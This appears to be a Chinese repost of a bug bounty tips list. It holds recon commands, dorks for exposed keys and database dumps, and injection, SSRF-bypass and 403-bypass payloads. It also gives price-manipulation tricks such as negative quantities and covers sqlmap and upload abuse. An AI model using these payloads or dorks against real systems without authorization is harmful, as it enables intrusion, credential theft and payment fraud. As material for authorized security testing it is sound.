From:https://www.infosecmatter.com/bug-bounty-tips/
感觉老外挖赏金的还挺多,没事就秀一下赏了多少钱,有人做了一系列的挖赏金的技巧,都是从推上找的,我转过来给大家,有涨姿势甚好。
前面一些我之前发过了,没看过的可以看看,后面的是最近新加的。
不知道各位小伙伴还有在挖src的吗?
查询是否存在heart bleed漏洞
cat list.txt | while read line ; do echo "QUIT" | openssl s_client -connect $line:443 2>&1 | grep 'server extension "heartbeat" (id=15)' || echo $line: safe; done
使用grep去除垃圾数据
curl http://host.xx/file.js | grep -Eo"(http|https)://[a-zA-Z0-9./?=_-]*"*cat file | grep -Eo"(http|https)://[a-zA-Z0-9./?=_-]*"*
从APK中获得敏感数据
先使用apktool解包
apktool d app_name.apkgrep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insertinto" APKfolder/远程解压文件
pip install remotezip
#列出远程压缩包文件内容
remotezip -l http://site/bigfile.zip
#解压里面的文件
remotezip "http://site/bigfile.zip" "file.txt"
Top25 ssrf dorks
Top25重定向dorks
使用SecurityTrails API查询子域名
去https://securitytrails.com/申请个免费的API
curl -s --request GET --url https://api.securitytrails.com/v1/domain/target.com/subdomains?apikey=API_KEY |jq '.subdomains[]' | sed 's/"//g' >test.txt 2>/dev/null &&sed "s/$/.target.com/" test.txt | sed 's/ //g' && rm test.txt
邮件地址payload
XSS
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
SSTI
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
SQL injection
"' OR 1=1 -- '"@example.com
"mail'); --"@example.com
SSRF
[email protected]
john.doe@[127.0.0.1]
数据库文件
/back.sql
/backup.sql
/accounts.sql
/backups.sql
/clients.sql
/customers.sql
/data.sql
/database.sql
/database.sqlite
/users.sql
/db.sql
/db.sqlite
/db_backup.sql
/dbase.sql
/dbdump.sql
setup.sql
sqldump.sql
/dump.sql
/mysql.sql
/sql.sql
/temp.sql
在Drupal上找到隐藏的页面
https://target.com/node/1
https://target.com/node/2
https://target.com/node/3
…
https://target.com/node/499
https://target.com/node/500
Google dorks
inurl:example.comintitle:"index of"
inurl:example.comintitle:"index of /" "*key.pem"
inurl:example.com ext:log
inurl:example.comintitle:"index of" ext:sql|xls|xml|json|csv
inurl:example.com"MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git
使用Shodan查找RocketMQ控制台
org:target.comhttp.title:rocketmq-console
使用Shodan查找Spring Boot服务器
org:YOUR_TARGEThttp.favicon.hash:116323821
如果/env可用,则可能可以实现RCE。如果可以访问/ heapdump,则可能会找到私钥和令牌。
HTTP Accept头修改
通过更改Accept标头来发现某些Web服务器中的信息泄露:
Accept: application/json,text/javascript, */*; q=0.01一些易受攻击的Web服务器可能会泄露服务器版本信息,路由信息。
通过网站图标ico哈希查找相关域
https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py
SSRF payload绕过WAF
1)使用CIDR绕过SSRF:
http://127.127.127.127
http://127.0.0.0
2)使用稀有地址绕过:
http://127.1
http://0
3)使用技巧组合绕过:
http://1.1.1.1 &@2.2.2.2#@3.3.3.3/
urllib : 3.3.3.3
4)绕过弱解析器:
http://127.1.1.1:[email protected]:80/
5)用[::]绕过localhost:
http://[::]:80/
http://0000::1:80/
目录浏览
当你获得个目录浏览的时候
wget -r --no-parent target.com/dir
使用此命令将文件和目录结构下载回来
价格操纵
如果无法更改产品价格参数,请更改产品数量:
items[1][数量] = 1 –> 234 RMB
items[1][数量] = 0.1 –> 23.4 RMB
将2个产品添加到购物篮中-假设一个产品是40美元
如果以这种方式处理请求:
{"items":{"laptop":1," mobile":1}}
将JSON正文更改为:
{"items":{"laptop":4," mobile":-2}}
两件商品的费用将变为$ 20:
4 * $ 40 – 2 * $ 70 = $ 160 – $ 140 = $ 20
选择要购买的任何物品
选择一种支付方式作为付款方式,拦截所有请求
直到从支付方式获得名为“金额”的参数
价格操纵并将其更改为0.01 $
付款,等待确认
使用gau和httpx查找javascript文件
需安装以下2个工具
https://github.com/projectdiscovery/httpx
https://github.com/lc/gau
echo target.com | gau | grep'.js$' | httpx -status-code -mc 200 -content-type | grep'application/javascript'
从JS文件中提取API
cat file.js | grep -aoP"(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))"| sort -u
通过篡改URI访问管理面板/绕过403
https://target.com/admin/ –>HTTP 302(重定向到登录页面)
https://target.com/admin..;/–> HTTP 200 OK
https://target.com/../admin
https://target.com/whatever/..;/admin
site.com/secret –> HTTP 403
site.com/secret/-> HTTP 200OK
site.com/secret/。–> HTTP 200确定
site.com//secret//-> HTTP200 OK
site.com/./secret/ .. –>HTTP 200 OK
在SVN中查找数据库信息
https://github.com/anantshri/svn-extractor
./svn-extractor.py--url http://url.com --matchdatabase.php
直接从APK中获取信息
https://github.com/ndelphit/apkurlgrep
apkurlgrep -a /path/to/file.apk
Result of URLs:
https://example.com
https://example.net
https://example.edu
Result of URLs Paths:
/example
/admin
/onboarding
在JS文件中查找隐藏的GET参数
搜寻JS中的变量名称,例如:
var test = "xxx"
尝试将每个参数作为GET参数来发现隐藏的参数,例如:
https://example.com/?test="xsstest
这通常会导致XSS
assetfinder example.com | gau |egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; dovars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed's/.*/&=xss/g'); echo -e "e[1;33m$urlne[1;32m$vars"; done
GitHub dorks查找敏感信息
extension:pem private
extension:ppk private
extension:sql mysql dump password
extension:json api.forecast.io
extension:json mongolab.com
extension:yaml mongolab.com
extension:ica [WFClient] Password=
extension:avastlic "support.avast.com"
extension:js jsforce conn.login
extension:json googleusercontentclient_secret
https://github.com/techgaun/github-dorks
通过添加X- HTTP头绕过限制
X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwared-Host: IP
尝试以下IP
192.168.0.0/16
172.16.0.0/12
127.0.0.0/8
10.0.0.0/8
Firebird数据库注入不出数据
python sqlmap.py -r req -p vuln --level 3--risk 3 --thread 8 --dbms Firebird --tables
上传利用
当你获得个上传点的时候,上传不同后缀文件可以获得什么
Asp/aspx/php/jsp -> webshell/rce
Svg -> ssrf/xxe/xss
Gif-> xss
Csv->csv注入
Xml->xxe
Avi->LFI/SSRF
HTML/js->xss/重定向
Zip->rce/lfi
Pdf/pptx->ssrf/xxe
api接口
获取到一个api的时候,如:
/api/getUser
可以对后面的参数fuzz,如:
/api/getUser$FUZZ$
基于cookie的php文件包含
尝试改变它
lang=langPack/blabla
本文始发于微信公众号(关注安全技术):赏金漏洞挖掘的几个技巧
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论